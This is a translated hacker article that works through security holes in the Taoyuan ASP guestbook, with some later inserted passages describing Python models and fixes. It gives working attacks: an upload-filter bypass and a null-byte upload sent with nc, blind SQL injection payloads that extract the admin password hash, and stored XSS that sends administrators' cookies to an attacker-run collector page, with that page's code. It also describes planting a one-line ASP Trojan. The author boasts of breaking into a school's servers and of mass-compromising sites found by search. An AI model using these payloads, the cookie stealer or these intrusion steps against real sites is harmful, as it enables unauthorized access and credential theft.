Research on the vulnerabilities in the Taoyuan guestbook

Source: Internet
Author: User
Tags: md5, save file, website, server, administrator password
The Taoyuan guestbook is an ASP guestbook system developed by Taoyuan Studio (http://www.mytaoyuan.com/). Because its interface is fresh, its functions are powerful and its operation is concise, it has been adopted by many sites large and small and praised by many webmasters. It has been upgraded from the original version 2.0 to the current version 3.0, which is also what the official site runs. Some time ago, when I broke into our school's website, I found this guestbook on a department's site. So I studied it: I downloaded the source code of each version, read part of the code, and found many holes.
I. Upload vulnerability
While searching the internet I found that someone had already published an upload vulnerability, but that post covered only version 2.0 and was not comprehensive. In fact this upload vulnerability exists in every version of the Taoyuan guestbook. Every version has three upload pages: upfile_article.asp, upfile_dialog.asp and upfile_photo.asp. The upload vulnerability here is essentially the same as the one in DvBBS (动网) 3.51. The DvBBS upload hole was published long ago, and I believe everyone is quite familiar with it, but I still want to go through it here. Look at this section of code in upfile_article.asp of the latest version, 3.0:
For Each formName In upload.file            ' enumerates every uploaded file: a For loop!
    Set ofile = upload.file(formName)       ' creates the file object
    ...
    arrUpFileType = Split(UpFileType, "|")  ' the defined list of suffixes allowed for upload
    For i = 0 To UBound(arrUpFileType)
        If fileEXT = Trim(arrUpFileType(i)) Then
            EnableUpload = True             ' hoho, the EnableUpload variable is changed here!
            Exit For
        End If
    Next
    If fileEXT = "asp" Or fileEXT = "asa" Or fileEXT = "aspx" Or fileEXT = "cer" Or fileEXT = "cdx" Then   ' ha, these are filtered
        EnableUpload = False
    End If
    If EnableUpload = False Then
        msg = "This file type is not allowed to be uploaded!\n\nOnly these file types may be uploaded: " & UpFileType
        FoundErr = True                     ' hoho, the FoundErr variable is changed here!
    End If
    ...
    If FoundErr <> True Then                ' the other important place: FoundErr decides whether the file is saved
        Randomize
        ranNum = Int(900 * Rnd) + 100       ' generates a random number
        FileName = SavePath & Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & ranNum & "." & fileEXT   ' the suffix of the uploaded file is kept as-is
    ...
This is a modified componentless upload (无组件上传) class. I will not repeat the analysis of the vulnerability's principle, because too many people have analysed it already. The componentless upload class can upload several files at once, and the author did not consider this case. Suppose we upload two files, the first 1.gif and the second 2.php. Because 1.gif matches an allowed suffix, EnableUpload becomes True. When the second file 2.php is processed, the variable still holds that value; php is not one of the special cases asp, asa, aspx, cer and cdx, so it slips past the check, FoundErr <> True, and 2.php is saved to the server together with 1.gif. 1.gif is uploaded only as cover for 2.php, and the second file can have any suffix other than asp, asa, aspx, cer and cdx. If the server supports JSP, a JSP Trojan can be uploaded the same way. In fact this 3.0 version of upfile_article.asp has been patched against the upload bug, but the patch is not thorough and can still be bypassed. In the earlier versions 2.0 and 2.1 the sentence above reads only If fileEXT = "asp" Or fileEXT = "asa" Or fileEXT = "aspx" Then, so an ASP Trojan with a cer or cdx suffix goes through easily. Version 3.0 is really strange: upfile_article.asp and upfile_photo.asp were patched by adding cer and cdx to the filter, but upfile_dialog.asp is the same as in versions 2.0 and 2.1. So in the 3.0 edition we can use upfile_dialog.asp directly; the key part of the modified upload_dialog.asp is:
<body bgcolor=menu leftmargin="5" topmargin="0">
<form action="http://www.mytaoyuan.com/ly/Upfile_Dialog.asp" method="post" name="form1" onsubmit="return check()" enctype="multipart/form-data">
<input name="FileName" type="file" class="tx1" size="...">
<input name="FileName1" type="file" class="tx1" size="...">
<input type="submit" name="submit" value="Upload">
<input name="DialogType" type="hidden" id="DialogType" value="pic">
</form>
</body>
The hidden variable DialogType is shown in Figure 1. Hoho: choose a GIF for the first file, rename the ASP Trojan to the cdx suffix for the second, upload, and it is done, as shown in Figure 2.
The 3.0 version of upfile_article.asp does not fix this vulnerability properly. In fact, ever since the DvBBS upload hole was published, many systems have had similar holes, and many webmasters patch the upload hole in this way without understanding the real principle. We construct a file with the suffix "asp. gif", again using the modified upload_article.asp form, and upload two files, the first 1.gif and the second 2.asp. gif. Then we capture the upload request and save it as bao.txt, open bao.txt with WinHex, and change the 20 corresponding to the space to 00 (I believe everyone is skilled at this). Then submit it with nc: nc www.mytaoyuan.com 80 < bao.txt, and the ASP Trojan is uploaded, as pictured. A better patch can be found in upfile_dialog.asp:
If FoundErr <> True Then
    Randomize
    ranNum = Int(900 * Rnd) + 100
    FileName = SavePath & Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & ranNum & "." & fileEXT
    ofile.SaveToFile Server.MapPath(FileName)   ' save the file
After the line FileName = SavePath & ofile.FileName, add FileName = Replace(FileName, Chr(0), ""), which filters out the 00 byte.
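As an added illustration (Python, not the guestbook's own ASP), the following models the upload loop of upfile_article.asp: flawed_check() keeps the two defects described above (EnableUpload and FoundErr live outside the per-file loop, and a null byte in the file name is not stripped), while hardened_check() judges each file on its own and applies the Replace(FileName, Chr(0), "") fix before reading the suffix. ALLOWED is an assumed UpFileType value and all sample file names are constructed.

```python
# Added example, not code from the Taoyuan guestbook. Models the per-request
# upload check of upfile_article.asp and a per-file hardened version.
ALLOWED = "gif|jpg|png"                           # assumed UpFileType value
BLOCKED = {"asp", "asa", "aspx", "cer", "cdx"}    # the 3.0 deny list on the page

def ext_of(name):
    """Suffix after the last dot, lower-cased; '' when there is none."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""

def saved_as(name):
    """What the file system actually stores: the name is cut at the first NUL."""
    return name.split("\x00", 1)[0]

def flawed_check(filenames):
    """Returns the names the ASP logic would save. Flags are set once per request,
    never per file, and a NUL-terminated name is judged by its decoy suffix."""
    allowed = [e.strip() for e in ALLOWED.split("|")]
    enable_upload = False          # never reset between files
    found_err = False              # once True, nothing later is saved
    accepted = []
    for name in filenames:
        ext = ext_of(name)
        if ext in allowed:
            enable_upload = True
        if ext in BLOCKED:
            enable_upload = False
        if not enable_upload:
            found_err = True
        if not found_err:
            accepted.append(saved_as(name))
    return accepted

def hardened_check(filenames):
    """Each file is validated independently; NUL is removed before the suffix is
    read (the page's Replace(FileName, Chr(0), "")); the allow list decides."""
    allowed = {e.strip() for e in ALLOWED.split("|")}
    accepted = []
    for name in filenames:
        clean = name.replace("\x00", "")
        ext = ext_of(clean)
        if ext in allowed and ext not in BLOCKED:
            accepted.append(saved_as(clean))
    return accepted
```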

II. Injection vulnerability
Open the guestbook and you will find a search box at the bottom of the page (Figure 3). Look at the corresponding code in default.asp:
Select Case option1
    Case 1
        sql = "Select * from guest where " & mark & " subject like '%" & text & "%'" & jinghua & " order by top1, lastdate desc"
    Case 2
        sql = "Select * from guest where " & mark & " content like '%" & text & "%'" & jinghua & " order by top1, lastdate desc"
    Case 3
    ...
The text variable is not filtered anywhere, before or after. If we enter the search term Suggest' and 1=1 and '%'='
the query becomes subject like '%Suggest' and 1=1 and '%'='%' and webid= order by top1, lastdate desc: the single quotes balance, and the page returns the matching content normally. My tests on the official Taoyuan guestbook site were as follows:
Suggest' and 1=(select @@version) and '%'='   // check whether the database is SQL Server
Suggest' and 0<>(select count(*) from register) and '%'='   // check whether the administrator table register exists; I was afraid the administrator had changed the default table name
Suggest' and 0<>(select id from register where username='admin') and '%'='   // check whether the admin's username is admin
Suggest' and (select username from register where username='rain or shine') and '%'='   // OK, the administrator is "rain or shine"; this was seen from the guestbook itself
Suggest' and 0<>(select id from register where id=1) and '%'='   // check whether the administrator's id is 1
Suggest' and exists(select id from register where len(password1)=16 and id=1) and '%'='   // check whether the administrator password is also MD5-hashed
Suggest' and (select top 1 id from register where id=1 and asc(mid(password1,1,1))<100) and '%'='   // guess the password character by character; it is already known to be a 16-character MD5 hash
Suggest' and (select top 1 id from register where id=1 and asc(mid(password1,1,1))=51) and '%'='
Suggest' and (select top 1 id from register where id=1 and asc(mid(password1,2,1))<100) and '%'='
...
After guessing all 16 characters of the MD5 password this way and mapping the ASCII codes back through the code table, the password ciphertext is 350e2cfa35948c49. You can verify this by submitting:
Suggest' and (select password1 from register where password1='350e2cfa35948c49') and '%'='
Basically nothing in the Taoyuan guestbook is filtered. Now look at show.asp, which displays a message:
dsql = "Delete from reply where id1=" & Request("id")
conn.Execute(dsql)
rs.Open "Select * from guest where id=" & Request("id1"), conn, 2, 3
The id variable is not filtered at all, so clicking on any message gives an injection point.
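As an added illustration (Python with SQLite, not the guestbook's own code), the following rebuilds the Case 1 search of default.asp, subject LIKE '%text%', so that the effect of the unfiltered text variable can be compared with a parameterized query; the same fix applies to the unfiltered id in show.asp. The guest table and its rows are constructed, and SQLite is an assumption (the guestbook uses Access or SQL Server), but quoting and LIKE behave the same for this purpose.

```python
import sqlite3

# Added example, not code from the Taoyuan guestbook. Constructed rows: the first
# subject ends in "Suggest" so the page's search term matches it.
ROWS = [(1, "Feature Suggest", "please add skins"),
        (2, "Bug report", "upload fails"),
        (3, "Hello", "nice guestbook")]

def make_db():
    """In-memory stand-in for the guest table (assumed minimal layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table guest(id integer, subject text, content text)")
    conn.executemany("insert into guest values (?, ?, ?)", ROWS)
    return conn

def search_concat(conn, text):
    """default.asp style: the search term is spliced into the SQL text, so a
    quote in it ends the string literal and the rest is parsed as SQL."""
    sql = "select id from guest where subject like '%" + text + "%' order by id"
    return [row[0] for row in conn.execute(sql)]

def search_param(conn, text):
    """Fixed: the term is bound as a parameter, so it can only ever be data;
    the wildcards are added around it in code, never in the SQL string."""
    sql = "select id from guest where subject like ? order by id"
    return [row[0] for row in conn.execute(sql, ("%" + text + "%",))]

# The page's true/false probes. With concatenation the result set follows the
# truth of the injected condition, which is what the blind guessing relies on;
# with binding both are ordinary search strings that match nothing.
PROBE_TRUE = "Suggest' and 1=1 and '%'='"
PROBE_FALSE = "Suggest' and 1=2 and '%'='"
```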
III. Cookie vulnerability
Reading login.asp, I found the following code:
Response.Cookies("ly").Path = cookiepath
Response.Cookies("ly")("useridname") = name
Response.Cookies("ly")("useridpassword") = pass
If rs("level1") = "admin" Then Response.Cookies("ly")("admin") = 1 Else If rs("level1") = "moderator" Then Response.Cookies("ly")("admin") = 2 Else Response.Cookies("ly")("admin") = 0
I was immediately pleased: if we can set the admin variable in the cookie ourselves, doesn't that make us administrators? The most convenient way to modify cookies is with Guilin Laobing's cookie-editing browser. But it didn't work, because default.asp contains:
If Session("useridname") <> "" Then
    rs.Open "Select level1 from register where username='" & Session("useridname") & "'", conn, 1, 1
    If Not rs.EOF Then
        If rs("level1") = "Administrator" Then Session("admin") = 1
        If rs("level1") = "Moderator" Then Session("admin") = 2
        If rs("level1") <> "moderator" And rs("level1") <> "admin" Then Session("admin") = 0
    Else
        Session("admin") = 0
    End If
This adds session authentication. The guestbook has no separate admin backend; an administrator performs management operations from the front end, and every page with a management function carries:
<%If Session("admin") <> 1 Then Response.Redirect "default.asp"%>
And the password in the cookie is stored in clear text, for example useridpassword=ccc&admin=1&useridname=ccc. So the password hash we obtained by injection above cannot be used by forging the cookie unless it is cracked. But there is still a security concern: because the password in the cookie is in the clear, confidentiality is poor; if someone peeks at it and our password is the same as our mailbox or QQ password, it is miserable.
IV. Cross-site scripting
This problem is more serious than the ones above. The flaw is mainly in guest_register.asp, where the avatar is defined: you can choose one of the system's own avatars or upload your own, and there is a box in which to fill in the address of your own avatar:
<input name="myface" type="text" class="input1" id="QQ3" size="...">
<br>
</font></div></td>
<td width="458" align="center"><div align="left"><iframe style="top:2px" id="uploadfiles" src="upload_photo.asp?photourlid=0" frameborder=0 scrolling=no width="..." height="..."></iframe>
<br>
Then in guest_info.asp, the page where you modify your registration information:
<td width="11%"><img src="..." width="..." height="..." id=idface></td>
The myface variable is not filtered. If we set the avatar to Yun_qi_img/11.gif"><script>alert('aaa')</script>, the final output is:
<script>alert('aaa')</script>" width="..." height="...">
<input name="myface" type="text" class="input1" id="QQ3" value="Yun_qi_img/11.gif"><script>alert('aaa')</script>" size="...">
Naturally the dialog box pops up twice, as shown in Figure 4. Testing further, the personal homepage field is also open to cross-site scripting. Fill in the homepage as:
http://<script>alert('aaa')</script>, and the final output is:
<a href="http://<script>alert('aaa')</script>" target="_blank">http://<script>alert('aaa')</script></a></font></div></td>
Our code runs again. There is some filtering on the QQ number field, but its length is limited, so it cannot be used for cross-site scripting.
So we build a cross-site attack: as long as the administrator reads our post or profile, he is hit. Didn't we see earlier that the password is displayed in the clear in the cookie? We steal the cookie through the XSS. Set the avatar to Yun_qi_img/11.gif"><script>window.open('http://webshell.com/qq156544632/co.asp?msg='+document.cookie)</script>
and the personal homepage to http://<script>window.open('http://webshell.com/qq156544632/co.asp?msg='+document.cookie)</script>, and that is all. The co.asp under our http://webshell.com/qq156544632/ should look like this:
<%
msg = Request.ServerVariables("QUERY_STRING")        ' the cookie arrives in the query string
testfile = Server.MapPath("qq156544632.txt")
Set fs = Server.CreateObject("Scripting.FileSystemObject")
Set thisfile = fs.OpenTextFile(testfile, 8, True, 0) ' 8 = append, create the file if missing
thisfile.WriteLine("" & msg & "")
thisfile.Close
Set fs = Nothing
%>
<script language=vbscript>window.close()</script>
(This code seems to be originally from lcx; thanks to him here.) So the administrator's cookie is written to http://webshell.com/qq156544632/qq156544632.txt.
Incidentally, the cross-site code above uses the FSO object, so your http://webshell.com/ must support FSO. The window.close() closes http://webshell.com/qq156544632/co.asp so as not to arouse suspicion. Look at the cookie I stole, shown in Figure 5.
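As an added illustration (Python, not the guestbook's code), the following shows the two profile values this section abuses, the custom avatar address myface and the personal homepage, being written into HTML unencoded, next to a renderer that encodes them for attribute context and accepts only plain http/https URLs for the homepage. The payloads are the ones above; the helper names and the markup skeleton are constructed.

```python
import html
from urllib.parse import urlsplit

# Added example, not code from the Taoyuan guestbook. The payloads are the
# ones the article uses; the markup skeleton is constructed.
AVATAR_PAYLOAD = "Yun_qi_img/11.gif\"><script>alert('aaa')</script>"
HOMEPAGE_PAYLOAD = "http://<script>alert('aaa')</script>"

def render_raw(myface, homepage):
    """guest_info.asp style: values spliced straight into the markup."""
    return ('<img src="%s" id=idface>' % myface
            + '<input name="myface" type="text" value="%s">' % myface
            + '<a href="%s" target="_blank">%s</a>' % (homepage, homepage))

def safe_homepage(url):
    """Return url only if it is an absolute http(s) URL with a host and no
    markup characters; a mere 'starts with http://' test lets the payload in."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if any(ch in url for ch in "<>\"' "):
        return None
    return url

def render_safe(myface, homepage):
    """Encode both values for attribute context (quotes included) and drop the
    homepage link entirely when the URL is not acceptable."""
    face = html.escape(myface, quote=True)
    out = ('<img src="%s" id=idface>' % face
           + '<input name="myface" type="text" value="%s">' % face)
    link = safe_homepage(homepage)
    if link is not None:
        esc = html.escape(link, quote=True)
        out += '<a href="%s" target="_blank">%s</a>' % (esc, esc)
    return out
```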
V. Other vulnerabilities
The default database of the Taoyuan guestbook is an MDB file with no protection against download. With more and more "hackers" around today, writing code this way is somewhat inappropriate. The management functions include backing up and restoring the database. Suppose we have obtained the management password and can perform management operations: if the database has been renamed to .asp, we can simply write a one-line ASP Trojan into the database anywhere, turning the database itself into the Trojan; if it has not been renamed, or we do not know the database path, we first write the one-line Trojan into the database and then back the database up. Because the backup defaults to an .asa file, if we back it up as Databackup/langzi.asa we can access http://www.xxx.com/Databackup/langzi.asa directly. Isn't that also usable as a one-line ASP Trojan?
Do you think there are a lot of holes after reading this? A guestbook usually plays only a supporting role on a website, so many webmasters pay too little attention to the security of guestbook scripts, and the developers of this guestbook did not put enough effort into security either. In fact, any small vulnerability can be a threat to the security of the server. Take me: through the holes in this guestbook I broke into a department's website at our school, then the school's main website, then took control of the school's web server, and finally got into the intranet and controlled all of the school's servers. I hope future script writers will put security first, and I also hope other similar guestbooks do not have the vulnerabilities mentioned in this article. A Baidu search for "Fill in the message user login to register to see the essence of the list" or other such keywords finds a large number of sites using the Taoyuan guestbook, more than 90% of which are vulnerable; I got a batch of webshells in an instant. The hole on the official Taoyuan guestbook site has not yet been fixed and the system is still available for download; I hope you will not go and plant Trojans in it, and will not attack other domestic websites.
My level is limited and I only read through the code roughly in limited time, so errors and omissions are unavoidable. You are welcome to contact me, QQ 156544632; of course it is best to discuss it on our "Hacker X Files" forum.
